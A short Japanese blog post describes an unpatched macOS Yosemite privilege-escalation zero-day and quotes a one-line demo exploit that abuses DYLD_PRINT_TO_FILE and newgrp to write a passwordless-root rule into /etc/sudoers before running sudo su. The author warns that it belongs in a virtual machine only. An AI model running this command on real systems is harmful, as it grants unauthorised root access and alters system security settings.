phoenix-power権限昇格の脆弱性が今も放置されてるらしい。

権限昇格の脆弱性(Exploit)というのはパスワードを回避して、ログインできる感じのものをいいます。あと、最新バージョンで修正されてない脆弱性をゼロデイと呼びます。つまり、今回のはYosemiteの権限昇格のゼロデイ。

デモは以下。仮想環境以外では実行しないように。/etc/sudoersの記述をミスると死にます。

1
$ echo python -c '"import os;os.write(3,\"ALL ALL=(ALL) NOPASSWD: ALL\")"'|DYLD_PRINT_TO_FILE=/etc/sudoers newgrp;sudo su

Linuxでもお馴染みだと思いますがsudoersファイルを使ったものになっています。このファイルはユーザー権限を管理するsudoの設定ファイルと言う感じのものですが、間違った書き方をして保存でもしてしまうと、大変なことになるので注意が必要なファイルです。通常はvisudoなどのコマンドを使って編集する感じですね。

ただ、権限昇格の脆弱性自体は緊急度は最高レベルではないため、それほど心配する必要はないかもしれません(コンピュータの使い方にもよりますが)。

一番注意が必要なのは、リモートで任意のコードを実行できるゼロデイ脆弱性で、この場合、コンピュータの使い方問わず攻撃されてしまう危険があります。

ただ、そうはいってもこれらは、ツールに依存するものから、OSそのものに対するものまで様々で、今回は、OSそのもの(sudoはデフォルトでインストールされているため、これをOSの機能の一部とみなす)に対するものなので、危険度は高め。Appleからの修正アップデートを待ちましょう。